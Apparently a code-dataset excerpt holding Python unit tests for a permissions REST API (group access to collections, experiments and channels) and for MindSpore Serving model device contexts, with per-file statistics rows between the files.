        # group does not exist
        url = '/' + version + '/permissions/?group=testeee'
        response = self.client.get(url)
        self.assertEqual(response.status_code, 404)
        # resource does not exist
        url = '/' + version + '/permissions/test/?collection=col1ee'
        response = self.client.get(url)
        self.assertEqual(response.status_code, 404)
    def test_delete_permission_for_collection(self):
        """
        Delete a subset of permissions for a collection
        """
        url = '/' + version + '/permissions/'
        data = {
            'group': 'test',
            'collection': 'col1',
            'permissions': ['read', 'add', 'update']
        }
        response = self.client.post(url, data=data)
        self.assertEqual(response.status_code, 201)
        url = '/' + version + '/permissions/?group=test&collection=col1'
        response = self.client.delete(url, None)
        self.assertEqual(response.status_code, 204)
    def test_patch_permission_for_collection(self):
        """
        Patch the permissions for a collection down to a subset and verify
        the new permission set is returned on a subsequent GET
        """
        url = '/' + version + '/permissions/'
        data = {
            'group': 'test',
            'collection': 'col1',
            'permissions': ['read', 'add', 'update']
        }
        response = self.client.post(url, data=data)
        self.assertEqual(response.status_code, 201)
        url = '/' + version + '/permissions/?group=test&collection=col1'
        response = self.client.get(url)
        resp = json.loads(response.content.decode('utf-8'))
        self.assertEqual(set(resp["permission-sets"][0]["permissions"]), set(['read', 'add', 'update']))
        self.assertEqual(response.status_code, 200)
        # Patch down to read-only
        url = '/' + version + '/permissions/test/col1'
        data = {
            'group': 'test',
            'collection': 'col1',
            'permissions': ['read']
        }
        response = self.client.patch(url, data=data)
        self.assertEqual(response.status_code, 200)
        url = '/' + version + '/permissions/?group=test&collection=col1'
        response = self.client.get(url)
        resp = json.loads(response.content.decode('utf-8'))
        self.assertEqual(set(resp["permission-sets"][0]["permissions"]),set(['read']))
        self.assertEqual(response.status_code, 200)
class PermissionViewsExperimentTests(APITestCase):
    """
    Class to test the permission service which assigns permissions to experiments
    """
    def setUp(self):
        """
        Initialize the database with two users; 'testuser' (resource-manager
        role) is logged in, and each user owns a group.
        :return:
        """
        dbsetup = SetupTestDB()
        self.user1 = dbsetup.create_user('testuser2555')
        dbsetup.set_user(self.user1)
        dbsetup.create_group('unittest2555')
        self.user2 = dbsetup.create_user('testuser')
        dbsetup.add_role('resource-manager')
        dbsetup.set_user(self.user2)
        self.client.force_login(self.user2)
        dbsetup.create_group('test')
        dbsetup.insert_test_data()
    def test_post_permission_experiment(self):
        """
        Post permissions for a valid group and experiment
        """
        url = '/' + version + '/permissions/'
        data = {
            'group': 'test',
            'collection': 'col1',
            'experiment': 'exp1',
            'permissions': ['read', 'add', 'update']
        }
        response = self.client.post(url, data=data)
        self.assertEqual(response.status_code, 201)
    def test_post_invalid_permissions_experiment(self):
        """
        Post invalid permissions strings
        """
        url = '/' + version + '/permissions/'
        data = {
            'group': 'test',
            'collection': 'col1',
            'experiment': 'exp1',
            # 'readeeee' is not a valid permission string
            'permissions': ['readeeee', 'add', 'update']
        }
        response = self.client.post(url, data=data)
        self.assertEqual(response.status_code, 400)
    def test_post_permissions_invalid(self):
        """
        Post permissions to a resource or group that does not exist
        """
        # Resource does not exist
        url = '/' + version + '/permissions/'
        data = {
            'group': 'test',
            'collection': 'col1eee',
            'experiment': 'exp1',
            'permissions': ['read', 'add', 'update']
        }
        response = self.client.post(url, data=data)
        self.assertEqual(response.status_code, 404)
        # group does not exist
        url = '/' + version + '/permissions/'
        data = {
            'group': 'testeee',
            'collection': 'col1',
            'experiment': 'exp1',
            'permissions': ['read', 'add', 'update']
        }
        response = self.client.post(url, data=data)
        self.assertEqual(response.status_code, 404)
    def test_get_permission_for_collection_filter_group(self):
        """
        Get permissions for an experiment, filtered by group
        """
        url = '/' + version + '/permissions/'
        data = {
            'group': 'test',
            'collection': 'col1',
            'experiment': 'exp1',
            'permissions': ['read', 'add', 'update']
        }
        response = self.client.post(url, data=data)
        self.assertEqual(response.status_code, 201)
        url = '/' + version + '/permissions/?group=test'
        response = self.client.get(url)
        self.assertEqual(response.status_code, 200)
    def test_get_permission_for_experiment_filter_experiment(self):
        """
        Get permissions for an experiment, filtered by collection and experiment
        """
        url = '/' + version + '/permissions/'
        data = {
            'group': 'test',
            'collection': 'col1',
            'experiment': 'exp1',
            'permissions': ['read', 'add', 'update']
        }
        response = self.client.post(url, data=data)
        self.assertEqual(response.status_code, 201)
        url = '/' + version + '/permissions/?collection=col1&experiment=exp1'
        response = self.client.get(url)
        self.assertEqual(response.status_code, 200)
    def test_get_permission_invalid(self):
        """
        Get permissions for a resource that does not exist or a group that does not exist
        """
        # group does not exist
        url = '/' + version + '/permissions/?group=testeee'
        response = self.client.get(url)
        self.assertEqual(response.status_code, 404)
        # resource does not exist
        url = '/' + version + '/permissions/test/?collection=col1&experiment=exp1eeeee'
        response = self.client.get(url)
        self.assertEqual(response.status_code, 404)
    def test_delete_permission_for_experiment(self):
        """
        Delete a subset of permissions for an experiment
        """
        url = '/' + version + '/permissions/'
        data = {
            'group': 'test',
            'collection': 'col1',
            'experiment': 'exp1',
            'permissions': ['read', 'add', 'update']
        }
        response = self.client.post(url, data=data)
        self.assertEqual(response.status_code, 201)
        url = '/' + version + '/permissions/?group=test&collection=col1&experiment=exp1'
        response = self.client.delete(url, None)
        self.assertEqual(response.status_code, 204)
    def test_delete_permission_for_experiment_invalid_group(self):
        """
        Delete permissions for an experiment using a group that does not exist
        """
        url = '/' + version + '/permissions/?group=testeeee&collection=col1&experiment=exp1'
        response = self.client.delete(url, None)
        self.assertEqual(response.status_code, 404)
    def test_delete_permission_for_experiment_missing_group(self):
        """
        Delete permissions for an experiment without specifying a group;
        the request should be rejected
        """
        url = '/' + version + '/permissions/?collection=col1&experiment=exp1'
        response = self.client.delete(url, None)
        self.assertEqual(response.status_code, 400)
    def test_delete_permission_for_experiment_missing_resource(self):
        """
        Delete permissions without specifying a resource;
        the request should be rejected
        """
        url = '/' + version + '/permissions/?group=test'
        response = self.client.delete(url, None)
        self.assertEqual(response.status_code, 400)
    def test_patch_permission_for_experiment(self):
        """
        Patch the permissions for an experiment down to a subset and verify
        the new permission set is returned on a subsequent GET
        """
        url = '/' + version + '/permissions/'
        data = {
            'group': 'test',
            'collection': 'col1',
            'experiment': 'exp1',
            'permissions': ['read', 'add', 'update']
        }
        response = self.client.post(url, data=data)
        self.assertEqual(response.status_code, 201)
        url = '/' + version + '/permissions/?group=test&collection=col1&experiment=exp1'
        response = self.client.get(url)
        resp = json.loads(response.content.decode('utf-8'))
        self.assertEqual(set(resp["permission-sets"][0]["permissions"]), set(['read', 'add', 'update']))
        self.assertEqual(response.status_code, 200)
        # Patch down to read-only
        url = '/' + version + '/permissions/'
        data = {
            'group': 'test',
            'collection': 'col1',
            'experiment': 'exp1',
            'permissions': ['read']
        }
        response = self.client.patch(url, data=data)
        self.assertEqual(response.status_code, 200)
        url = '/' + version + '/permissions/?group=test&collection=col1&experiment=exp1'
        response = self.client.get(url)
        resp = json.loads(response.content.decode('utf-8'))
        self.assertEqual(set(resp["permission-sets"][0]["permissions"]), set(['read']))
        self.assertEqual(response.status_code, 200)
class PermissionViewsChannelTests(APITestCase):
    """
    Tests for the permission service endpoints that assign permissions to channels.
    """

    def setUp(self):
        """
        Initialize the database with two users, their groups, and test resources.
        :return:
        """
        dbsetup = SetupTestDB()
        self.user1 = dbsetup.create_user('testuser2555')
        dbsetup.add_role('resource-manager')
        dbsetup.set_user(self.user1)
        dbsetup.create_group('unittest2555')
        self.user2 = dbsetup.create_user('testuser')
        dbsetup.add_role('resource-manager')
        dbsetup.set_user(self.user2)
        self.client.force_login(self.user2)
        dbsetup.create_group('test')
        dbsetup.insert_test_data()

    def _url(self, query=None):
        """Return the permissions endpoint, optionally with a query string appended."""
        endpoint = '/' + version + '/permissions/'
        return endpoint + '?' + query if query else endpoint

    def _channel_payload(self, **overrides):
        """Default channel-level permission payload; keyword overrides replace fields."""
        payload = {
            'group': 'test',
            'collection': 'col1',
            'experiment': 'exp1',
            'channel': 'channel1',
            'permissions': ['read', 'add', 'update'],
        }
        payload.update(overrides)
        return payload

    def _grant_channel_permissions(self):
        """POST the default channel payload and verify that it is accepted."""
        response = self.client.post(self._url(), data=self._channel_payload())
        self.assertEqual(response.status_code, 201)

    def test_post_permission_channel(self):
        """
        Post permissions for a valid group and channel
        """
        self._grant_channel_permissions()

    def test_post_invalid_permissions_channel(self):
        """
        Post invalid permissions strings
        """
        payload = self._channel_payload(permissions=['readeeee', 'add', 'update'])
        response = self.client.post(self._url(), data=payload)
        self.assertEqual(response.status_code, 400)

    def test_post_permissions_invalid(self):
        """
        Post permissions to a resource or group that does not exist
        """
        # Resource does not exist
        payload = self._channel_payload(collection='col1eee')
        response = self.client.post(self._url(), data=payload)
        self.assertEqual(response.status_code, 404)
        # group does not exist
        payload = self._channel_payload(group='testeee')
        response = self.client.post(self._url(), data=payload)
        self.assertEqual(response.status_code, 404)

    def test_get_permission_for_channel_filter_group(self):
        """
        Get permissions for a channel, filtering by group
        """
        self._grant_channel_permissions()
        response = self.client.get(self._url('group=test'))
        self.assertEqual(response.status_code, 200)

    def test_get_permission_for_channel_filter_channel(self):
        """
        Get permissions for a channel, filtering by the full resource path
        """
        self._grant_channel_permissions()
        response = self.client.get(self._url('collection=col1&experiment=exp1&channel=channel1'))
        self.assertEqual(response.status_code, 200)

    def test_get_permission_invalid(self):
        """
        Get permissions for a resource that does not exist or a group that does not exist
        """
        # group does not exist
        response = self.client.get(self._url('group=testeee'))
        self.assertEqual(response.status_code, 404)
        # resource does not exist
        url = '/' + version + '/permissions/test/?collection=col1&experiment=exp1eeeee&channel=exp1'
        response = self.client.get(url)
        self.assertEqual(response.status_code, 404)

    def test_delete_permission_for_channel(self):
        """
        Delete a subset of permissions for a channel
        """
        self._grant_channel_permissions()
        query = 'group=test&collection=col1&experiment=exp1&channel=channel1'
        response = self.client.delete(self._url(query), None)
        self.assertEqual(response.status_code, 204)

    def test_patch_permission_for_channel(self):
        """
        Patch permissions for a channel down to a subset and verify the result
        """
        self._grant_channel_permissions()
        query = 'group=test&collection=col1&experiment=exp1&channel=channel1'
        response = self.client.get(self._url(query))
        resp = json.loads(response.content.decode('utf-8'))
        self.assertEqual(set(resp["permission-sets"][0]["permissions"]), set(['read', 'add', 'update']))
        self.assertEqual(response.status_code, 200)
        # Shrink the permission set to read-only via PATCH.
        response = self.client.patch(self._url(), data=self._channel_payload(permissions=['read']))
        self.assertEqual(response.status_code, 200)
        response = self.client.get(self._url(query))
        resp = json.loads(response.content.decode('utf-8'))
        self.assertEqual(set(resp["permission-sets"][0]["permissions"]), set(['read']))
        self.assertEqual(response.status_code, 200)

    def test_post_permissions_for_channel_not_member_maintainer(self):
        """
        Post permissions as a user who is neither a member nor a maintainer
        """
        self.client.force_login(self.user1)
        payload = {
            'group': 'test',
            'collection': 'col1',
            'experiment': 'exp1',
            'permissions': ['read', 'add', 'update']
        }
        response = self.client.post(self._url(), data=payload)
        self.assertEqual(response.status_code, 403)

    def test_patch_permission_for_channel_not_member_maintainer(self):
        """
        Test patch permission if user is not a member or maintainer
        """
        self.client.force_login(self.user1)
        # patch permission on a group that the user is not a member or maintainer of.
        response = self.client.patch(self._url(), data=self._channel_payload(permissions=['read']))
        self.assertEqual(response.status_code, 403)

    def test_delete_permission_for_channel_not_member_maintainer(self):
        """
        Delete permissions as a user who is neither a member nor a maintainer
        """
        self.client.force_login(self.user1)
        # delete permission on a group that the user is not a member or maintainer of.
        query = 'group=test&collection=col1&experiment=exp1&channel=channel1'
        response = self.client.delete(self._url(query), None)
        self.assertEqual(response.status_code, 403)

    def test_post_permissions_public(self):
        """
        Post the read permission for the public group
        """
        payload = {
            'group': PUBLIC_GRP,
            'collection': 'col1',
            'experiment': 'exp1',
            'permissions': ['read']
        }
        response = self.client.post(self._url(), data=payload)
        self.assertEqual(response.status_code, 201)

    def test_post_permissions_public_invalid(self):
        """
        Post invalid permissions strings for the public group
        """
        # Only 'read' is acceptable for the public group; both payloads must fail.
        for permissions in (['add'], ['read', 'add']):
            payload = {
                'group': PUBLIC_GRP,
                'collection': 'col1',
                'experiment': 'exp1',
                'permissions': permissions
            }
            response = self.client.post(self._url(), data=payload)
            self.assertEqual(response.status_code, 400)

    def test_patch_permission_public_invalid(self):
        """
        Test patch permission for group public using invalid permissions
        """
        self.client.force_login(self.user1)
        # patch permission on a group that the user is not a member or maintainer of.
        payload = self._channel_payload(group=PUBLIC_GRP, permissions=['read', 'add'])
        response = self.client.patch(self._url(), data=payload)
        self.assertEqual(response.status_code, 400)
| 32.791721
| 105
| 0.571051
| 2,530
| 25,348
| 5.617391
| 0.067194
| 0.048551
| 0.101956
| 0.126513
| 0.920208
| 0.912679
| 0.905502
| 0.890656
| 0.884112
| 0.873135
| 0
| 0.019276
| 0.29596
| 25,348
| 772
| 106
| 32.834197
| 0.777093
| 0.124507
| 0
| 0.828157
| 0
| 0
| 0.197244
| 0.058668
| 0
| 0
| 0
| 0
| 0.142857
| 1
| 0.080745
| false
| 0
| 0.010352
| 0
| 0.097308
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2dde91e508d9bdf7343d1509871d0b8c7bec8a5d
| 18,439
|
py
|
Python
|
tests/ut/python/tests/test_model_context.py
|
mindspore-ai/serving
|
e32d989ce629b4bdbbf3f16fefb02b28dce2dc4c
|
[
"Apache-2.0"
] | 157
|
2020-12-10T09:42:48.000Z
|
2021-12-02T09:27:48.000Z
|
tests/ut/python/tests/test_model_context.py
|
mindspore-ai/serving
|
e32d989ce629b4bdbbf3f16fefb02b28dce2dc4c
|
[
"Apache-2.0"
] | 1
|
2021-12-08T11:39:59.000Z
|
2022-01-17T09:09:54.000Z
|
tests/ut/python/tests/test_model_context.py
|
mindspore-ai/serving
|
e32d989ce629b4bdbbf3f16fefb02b28dce2dc4c
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Test Model DeviceInfo"""
import os
import numpy as np
from common import serving_test, start_serving_server, create_client
from mindspore_serving.server.register import Context, GPUDeviceInfo, CPUDeviceInfo
from mindspore_serving.server.register import AscendDeviceInfo, GpuOptions, AclOptions
@serving_test
def test_model_context_device_info_set_get_success():
    """
    Feature: Model Device info
    Description: Test set and get device info
    Expectation: the values gotten are equal to the values set.
    """
    # A scalar affinity list must be rejected with a descriptive error.
    message = ""
    try:
        Context(thread_affinity_core_list=1)
    except RuntimeError as err:
        message = str(err)
    assert "Parameter 'thread_affinity_core_list' should be tuple/list of int, but actually <class 'int'>" in message

    ctx = Context(thread_num=3, thread_affinity_core_list=[1, 2, 3], enable_parallel=True)
    inner_ctx = ctx.model_context
    assert inner_ctx.thread_num == 3
    assert set(inner_ctx.thread_affinity_core_list) == {1, 2, 3}
    assert inner_ctx.enable_parallel == 1

    # Each device info exposes its configuration through context_map.
    gpu_info = GPUDeviceInfo(precision_mode="fp16")
    assert gpu_info.context_map["precision_mode"] == "fp16"
    assert gpu_info.context_map["device_type"] == "gpu"
    cpu_info = CPUDeviceInfo(precision_mode="fp16")
    assert cpu_info.context_map["precision_mode"] == "fp16"
    assert cpu_info.context_map["device_type"] == "cpu"
    ascend_info = AscendDeviceInfo(insert_op_cfg_path="some path of insert_op_cfg_path",
                                   input_format="NHWC1C0",
                                   input_shape="input_op_name1: n1,c2,h3,w4;input_op_name2: n4,c3,h2,w1",
                                   output_type="FP16",
                                   precision_mode="allow_mix_precision",
                                   op_select_impl_mode="high_precision",
                                   fusion_switch_config_path="some path of fusion_switch_config_path",
                                   buffer_optimize_mode="l1_and_l2_optimize")
    expected_ascend = {
        "insert_op_cfg_path": "some path of insert_op_cfg_path",
        "input_format": "NHWC1C0",
        "input_shape": "input_op_name1: n1,c2,h3,w4;input_op_name2: n4,c3,h2,w1",
        "output_type": "FP16",
        "precision_mode": "allow_mix_precision",
        "op_select_impl_mode": "high_precision",
        "fusion_switch_config_path": "some path of fusion_switch_config_path",
        "buffer_optimize_mode": "l1_and_l2_optimize",
        "device_type": "ascend",
    }
    for key, value in expected_ascend.items():
        assert ascend_info.context_map[key] == value

    # Appended device infos are reported back in insertion order.
    for info in (gpu_info, cpu_info, ascend_info):
        ctx.append_device_info(info)
    devices = inner_ctx.device_list
    assert len(devices) == 3
    assert devices[0]["device_type"] == "gpu"
    assert devices[1]["precision_mode"] == "fp16"
    assert devices[2]["precision_mode"] == "allow_mix_precision"
@serving_test
def test_model_context_device_info_repeat_append_ascend_failed():
    """
    Feature: Model Device info
    Description: Repeat append AscendDeviceInfo
    Expectation: raise RuntimeError
    """
    ctx = Context()
    ctx.append_device_info(AscendDeviceInfo())
    # A second Ascend info must be rejected; capture the error text to verify.
    message = ""
    try:
        ctx.append_device_info(AscendDeviceInfo())
    except RuntimeError as err:
        message = str(err)
    assert "Device info of type ascend has already been appended" in message
@serving_test
def test_model_context_options_set_get_success():
    """
    Feature: Model options
    Description: Test set and get options
    Expectation: the values gotten are equal to the values set.
    """
    # GpuOptions translates into a single gpu entry in the device list.
    gpu_entry = GpuOptions(precision_mode="fp16").context.model_context.device_list[0]
    assert gpu_entry["device_type"] == "gpu"
    assert gpu_entry["precision_mode"] == "fp16"

    acl_options = AclOptions(insert_op_cfg_path="some path of insert_op_cfg_path",
                             input_format="NHWC1C0",
                             input_shape="input_op_name1: n1,c2,h3,w4;input_op_name2: n4,c3,h2,w1",
                             output_type="FP16",
                             precision_mode="allow_mix_precision",
                             op_select_impl_mode="high_precision",
                             fusion_switch_config_path="some path of fusion_switch_config_path",
                             buffer_optimize_mode="l1_and_l2_optimize")
    acl_entry = acl_options.context.model_context.device_list[0]
    expected = {
        "insert_op_cfg_path": "some path of insert_op_cfg_path",
        "input_format": "NHWC1C0",
        "input_shape": "input_op_name1: n1,c2,h3,w4;input_op_name2: n4,c3,h2,w1",
        "output_type": "FP16",
        "precision_mode": "allow_mix_precision",
        "op_select_impl_mode": "high_precision",
        "fusion_switch_config_path": "some path of fusion_switch_config_path",
        "buffer_optimize_mode": "l1_and_l2_optimize",
        "device_type": "ascend",
    }
    for key, value in expected.items():
        assert acl_entry[key] == value
@serving_test
def test_model_context_gpu_device_info_serving_server_success():
    """
    Feature: Model Device info
    Description: Test set gpu device info
    Expectation: Serving server work well.
    """
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
from mindspore_serving.server.register import Context, GPUDeviceInfo, CPUDeviceInfo
from mindspore_serving.server.register import AscendDeviceInfo, GpuOptions, AclOptions
context = Context()
context.append_device_info(GPUDeviceInfo(precision_mode="fp16"))
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False,
                               context = context)
@register.register_method(output_names="y")
def predict(x1, x2):
    y = register.add_stage(model, x1, x2, outputs_count=1)
    return y
"""
    os.environ["SERVING_ENABLE_GPU_DEVICE"] = "1"
    server = start_serving_server(servable_content, device_type="GPU")
    # Drive the served model through a client and verify the elementwise add.
    left = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32)
    right = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32)
    client = create_client("localhost:5500", server.servable_name, "predict")
    result = client.infer([{"x1": left, "x2": right}])
    print("result", result)
    assert (result[0]["y"] == left + right).all()
@serving_test
def test_model_context_cpu_device_info_serving_server_success():
    """
    Feature: Model Device info
    Description: Test set cpu device info
    Expectation: Serving server work well.
    """
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
from mindspore_serving.server.register import Context, GPUDeviceInfo, CPUDeviceInfo
from mindspore_serving.server.register import AscendDeviceInfo, GpuOptions, AclOptions
context = Context()
context.append_device_info(CPUDeviceInfo(precision_mode="fp16"))
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False,
                               context = context)
@register.register_method(output_names="y")
def predict(x1, x2):
    y = register.add_stage(model, x1, x2, outputs_count=1)
    return y
"""
    os.environ["SERVING_ENABLE_CPU_DEVICE"] = "1"
    server = start_serving_server(servable_content, device_type="CPU")
    # Drive the served model through a client and verify the elementwise add.
    left = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32)
    right = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32)
    client = create_client("localhost:5500", server.servable_name, "predict")
    result = client.infer([{"x1": left, "x2": right}])
    print("result", result)
    assert (result[0]["y"] == left + right).all()
@serving_test
def test_model_context_ascend_device_info_serving_server_success():
    """
    Feature: Model Device info
    Description: Test set ascend device info
    Expectation: Serving server work well.
    """
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
from mindspore_serving.server.register import Context, GPUDeviceInfo, CPUDeviceInfo
from mindspore_serving.server.register import AscendDeviceInfo, GpuOptions, AclOptions
context = Context()
context.append_device_info(AscendDeviceInfo(input_format="NHWC1C0"))
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False,
                               context = context)
@register.register_method(output_names="y")
def predict(x1, x2):
    y = register.add_stage(model, x1, x2, outputs_count=1)
    return y
"""
    server = start_serving_server(servable_content, device_type="Ascend")
    # Drive the served model through a client and verify the elementwise add.
    left = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32)
    right = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32)
    client = create_client("localhost:5500", server.servable_name, "predict")
    result = client.infer([{"x1": left, "x2": right}])
    print("result", result)
    assert (result[0]["y"] == left + right).all()
@serving_test
def test_model_context_all_device_info_serving_server_success():
    """
    Feature: Model Device info
    Description: Test set cpu, gpu, ascend device info, and serving select one device info based on inference so
    Expectation: Serving server work well.
    """
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
from mindspore_serving.server.register import Context, GPUDeviceInfo, CPUDeviceInfo
from mindspore_serving.server.register import AscendDeviceInfo, GpuOptions, AclOptions
context = Context()
context.append_device_info(AscendDeviceInfo(input_format="NHWC1C0"))
context.append_device_info(GPUDeviceInfo(precision_mode="fp16"))
context.append_device_info(CPUDeviceInfo(precision_mode="fp16"))
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False,
                               context = context)
@register.register_method(output_names="y")
def predict(x1, x2):
    y = register.add_stage(model, x1, x2, outputs_count=1)
    return y
"""
    server = start_serving_server(servable_content)
    # Drive the served model through a client and verify the elementwise add.
    left = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32)
    right = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32)
    client = create_client("localhost:5500", server.servable_name, "predict")
    result = client.infer([{"x1": left, "x2": right}])
    print("result", result)
    assert (result[0]["y"] == left + right).all()
@serving_test
def test_model_context_acl_options_serving_server_success():
    """
    Feature: Model Device info
    Description: Test set ascend options
    Expectation: Serving server work well.
    """
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
from mindspore_serving.server.register import Context, GPUDeviceInfo, CPUDeviceInfo
from mindspore_serving.server.register import AscendDeviceInfo, GpuOptions, AclOptions
options = AclOptions(input_format="NHWC1C0")
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False,
                               options = options)
@register.register_method(output_names="y")
def predict(x1, x2):
    y = register.add_stage(model, x1, x2, outputs_count=1)
    return y
"""
    server = start_serving_server(servable_content)
    # Drive the served model through a client and verify the elementwise add.
    left = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32)
    right = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32)
    client = create_client("localhost:5500", server.servable_name, "predict")
    result = client.infer([{"x1": left, "x2": right}])
    print("result", result)
    assert (result[0]["y"] == left + right).all()
@serving_test
def test_model_context_gpu_options_serving_server_success():
    """
    Feature: Model Device info
    Description: Test set gpu options
    Expectation: Serving server work well.
    """
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
from mindspore_serving.server.register import Context, GPUDeviceInfo, CPUDeviceInfo
from mindspore_serving.server.register import AscendDeviceInfo, GpuOptions, AclOptions
options = GpuOptions(precision_mode="fp16")
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False,
                               options = options)
@register.register_method(output_names="y")
def predict(x1, x2):
    y = register.add_stage(model, x1, x2, outputs_count=1)
    return y
"""
    server = start_serving_server(servable_content)
    # Drive the served model through a client and verify the elementwise add.
    left = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32)
    right = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32)
    client = create_client("localhost:5500", server.servable_name, "predict")
    result = client.infer([{"x1": left, "x2": right}])
    print("result", result)
    assert (result[0]["y"] == left + right).all()
@serving_test
def test_model_context_gpu_options_invalid_parameter_failed():
    """
    Feature: Model Device info
    Description: Test set gpu options with an invalid precision_mode value
    Expectation: Serving server start failed.
    """
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
from mindspore_serving.server.register import Context, GPUDeviceInfo, CPUDeviceInfo
from mindspore_serving.server.register import AscendDeviceInfo, GpuOptions, AclOptions
options = GpuOptions(precision_mode="origi")
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False,
                               options = options)
@register.register_method(output_names="y")
def predict(x1, x2):
    y = register.add_stage(model, x1, x2, outputs_count=1)
    return y
"""
    # Startup must fail; capture the error text so a silent success also fails.
    message = ""
    try:
        start_serving_server(servable_content)
    except RuntimeError as err:
        message = str(err)
    assert "Gpu device info 'precision_mode' can only be 'origin', 'fp16'" in message
@serving_test
def test_model_context_gpu_options_invalid_parameter2_failed():
    """
    Feature: Model Device info
    Description: Test set gpu options with an unsupported option name
    Expectation: Serving server start failed.
    """
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
from mindspore_serving.server.register import Context, GPUDeviceInfo, CPUDeviceInfo
from mindspore_serving.server.register import AscendDeviceInfo, GpuOptions, AclOptions
options = GpuOptions(precision_xxx_mode="origin")
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False,
                               options = options)
@register.register_method(output_names="y")
def predict(x1, x2):
    y = register.add_stage(model, x1, x2, outputs_count=1)
    return y
"""
    # Startup must fail; capture the error text so a silent success also fails.
    message = ""
    try:
        start_serving_server(servable_content)
    except RuntimeError as err:
        message = str(err)
    assert "Set gpu device info failed, unsupported option precision_xxx_mode" in message
@serving_test
def test_model_context_gpu_cpu_device_device_ids_none_serving_server_success():
    """
    Feature: Model Device info
    Description: device_ids=None, and support GPU, CPU, running on CPU
    Expectation: Serving server work well.
    """
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
@register.register_method(output_names="y")
def predict(x1, x2):
    y = register.add_stage(model, x1, x2, outputs_count=1)
    return y
"""
    os.environ["SERVING_ENABLE_GPU_DEVICE"] = "1"
    os.environ["SERVING_ENABLE_CPU_DEVICE"] = "1"
    server = start_serving_server(servable_content, device_type=None, device_ids=None)
    # Drive the served model through a client and verify the elementwise add.
    left = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32)
    right = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32)
    client = create_client("localhost:5500", server.servable_name, "predict")
    result = client.infer([{"x1": left, "x2": right}])
    print("result", result)
    assert (result[0]["y"] == left + right).all()
@serving_test
def test_model_context_only_support_gpu_device_device_ids_none_serving_server_failed():
    """
    Feature: Model Device info
    Description: device_ids=None, and only support GPU, running on CPU failed
    Expectation: Serving server startup failed with a RuntimeError explaining
        that 'device_ids' must be set when CPU inference is not supported.
    """
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
@register.register_method(output_names="y")
def predict(x1, x2):
    y = register.add_stage(model, x1, x2, outputs_count=1)
    return y
"""
    os.environ["SERVING_ENABLE_GPU_DEVICE"] = "1"
    try:
        start_serving_server(servable_content, device_type=None, device_ids=None)
        # Bug fix: this guard was missing, so the test silently passed when
        # startup unexpectedly succeeded (sibling failure tests all have it).
        assert False
    except RuntimeError as e:
        assert "has models declared by declare_model, but parameter 'device_ids' of ServableStartConfig is not set in" \
               " Serving startup script when the MindSpore or Lite inference package not support CPU" in str(e)
| 39.653763
| 120
| 0.701719
| 2,454
| 18,439
| 5.025672
| 0.098207
| 0.060083
| 0.045407
| 0.059029
| 0.841725
| 0.800373
| 0.765102
| 0.73056
| 0.706154
| 0.693586
| 0
| 0.029692
| 0.185368
| 18,439
| 464
| 121
| 39.739224
| 0.791359
| 0.124953
| 0
| 0.754777
| 0
| 0
| 0.482826
| 0.212537
| 0
| 0
| 0
| 0
| 0.149682
| 1
| 0.041401
| false
| 0
| 0.130573
| 0
| 0.203822
| 0.022293
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2de4b0a01f1325775ad183101e54631782a82194
| 231
|
py
|
Python
|
setup_python_package/badges/__init__.py
|
LucaCappelletti94/setup_python_package
|
61b5f3cff1ed3181f932293c63c4fcb71cbe0062
|
[
"MIT"
] | 5
|
2019-09-17T14:46:35.000Z
|
2020-06-06T08:17:02.000Z
|
setup_python_package/badges/__init__.py
|
